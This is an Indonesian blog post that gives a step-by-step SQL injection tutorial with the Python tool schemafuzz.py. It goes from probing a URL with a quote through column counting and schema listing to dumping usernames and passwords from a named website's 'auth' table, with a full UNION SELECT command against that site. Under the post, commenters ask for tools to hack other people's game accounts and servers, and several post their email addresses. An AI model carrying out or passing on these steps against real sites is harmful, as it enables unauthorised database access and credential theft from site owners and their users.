Searching...
Selasa, 18 Januari 2011

SQL Injection

Tools ini berfungsi untuk hack SQL Injection yang di buat dengan bahasa Python....
Ingat Jangan digunakan untu, hal yang tidak baik.....
Utk pengguna windoss, install dlu interpreter python, coz bhs ini ga default ada… (ckckckc… windos… windos… repot emang). Utk linux, langsung pake aja… ^^
1. Cari dlu web yg vul terhadap SQL injection. “Gimana cara-nya mas?” tenang, blum selesai. Oke, bug SQL injc biasa-nya terdapat pada halaman news,berita, atau sejenis nya. Utk mengetahui web tsb vul atau tidak, coba gunakan single quote (’) di akhir url. Contoh: http://target.com/news.php?id=2′ <<>
2. Target kita kali ini adalah www.rayner.com/products.php?id=22 . setelah kita mendapatkan target yang vulnerable, yang harus kita cari pertama kali adalah jumlah column
a. cari jumlah column dan magic number,..
command :
schemafuzz.py – -findcol -u
Nanti akan muncul seperti ini:
disitu dapat kita lihat bahwa jumlah column nya adalah 10 dimulai dari angka 0, dan yang null adalah column ke 1,..
3. cari database name,..
command :
schemafuzz.py – -dbs -u
disini link url nya kita copykan dari out put langkah diatas yaitu darkc0de url. Yang di blok adalah nama Database-nya.
setelah kita mendapat kan nama databasenya sekarang kita liat schema table dan colum yang ada dalam database tersebut,
4. lihat table dan column,
command :
schemafuzz.py – -schema -u
jangan lupa untuk menambahkan nama database nya di depan url dengan command -D namatadabase
hasil nya akan terlihat seperti ini,

digambar terlihat jelas semua nama table dan columnnya, langkah terakhir adalah melihat semua data yang ada dalam table dan column tersebut, disini kita akan melihat data yang ada dalam table auth dengan nama column name,pass (Table No. 1)
5. lihat data dalam collum!
command :
schemafuzz.py – -dump -u
jangan lupa didepan url kita tambahkan nama database, nama table, dan nama column, dengan command -D namadatabe -T namatable -C namacolumn. Contoh : # python schemafuzz.py –dump -u http://www.rayner.com/products.php?id=22+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5,6,7,8,9 -D db2889_rayner_en -T auth -C name,pass
Yang di block adalah username dan password ^^

Sumber : Binus....

26 komentar :

  1. kk ini cara Hack Data Base buat apa
    Kalau buat RF giman caranya

    BalasHapus
  2. buat hack acoount orang bisa.. tapi klo kamu bisa..
    emangnya Rf nya mau di apain....

    BalasHapus
  3. kk ajarin hack id Rf orang
    mohon pencerahan nya"

    BalasHapus
  4. kasian yang punya kalau di hack

    BalasHapus
  5. OM buat hack server RF gimana? Bagi tutor lengkapnya kalo emang anda bisa, gw kesulitan neh.. RF private aja

    BalasHapus
  6. INI BISA BUAT HACK DATA BASE RF GK, SOALNYA GW KESE BANGET AMA GM NYA SOK BANGET PLISS GW MOHON

    BalasHapus
  7. OM avi.... cara dapet TOOLS ny gimana??? rf anek kena hack nich... kalo bisa tolong ajarkan cara hack database rf secara lengkap ya....

    kirim ke email aj....

    Email: noelz_saputra@yahoo.co.id

    BalasHapus
  8. wah si noelz ksni kwkwwkk

    BalasHapus
  9. bagi link nya donk bang..

    trus sama cara edit data base bang..

    bagi tutorial nya aja bang..

    BalasHapus
  10. bagi link nya donk kk

    BalasHapus
  11. bagi linkya donk

    BalasHapus
  12. wah mantap kali nih om

    BalasHapus
  13. lumayan nih
    nambah2 ilmu hahaha

    BalasHapus
  14. kk bagi link buat hack database dong !!! aku mau hack database orang luar yang rese

    BalasHapus
  15. caranya download gmna itu kasih link di Email aku iia !!!

    ryzq_ari@gmail.com

    BalasHapus
  16. bagi link bang..
    wa minta..
    mau belajar...

    blegion@ymail.com

    BalasHapus
  17. bisa buat hack vtc rab online ga?
    oh iya nama toolsnya apa? saya minta dong, tolong kirimkan toolsnya ke deejayradhitya@gmail.com

    BalasHapus
  18. bagi link nya donk bank kirim abiyyuhakam@yahoo.co.id

    BalasHapus
  19. kk aku mau nanya nih!
    link normal contoh diatas kan http://target.com/news.php.
    trus yang aku ngak ngerti dari mana dapat tambahan linknya ?id=2′...madsudnya linknya jadi seperti ini
    http://target.com/news.php?id=2′

    dari mana kk?
    tolong kasih tau kk

    plissss

    BalasHapus
  20. ini kan menggunakan linux

    BalasHapus
  21. Itu semua program aplikasi linux, untuk windows ada keterangan di atas nama aplikasinya SQL injection dan kawan mohon dibaca lagi kawan2. untuk Link Download cari di source web resmi aja pasti ada yg terbaru supaya Update.. Thanks Visit My blog ^_^

    BalasHapus
  22. ane kurang faham gan, ane pakai win 7 !!

    BalasHapus
  23. yaudah om ente aja yg nge hack tar inbox username ama pass nya :v

    BalasHapus
    Balasan
    1. mohon maaf gan posting ini sudah ga work. karena semakin kesini pemrograman berbasis database/SQL sudah semakin baik. walaupun masih ada bug2 yang sering ditemui.

      Hapus

 
Back to top!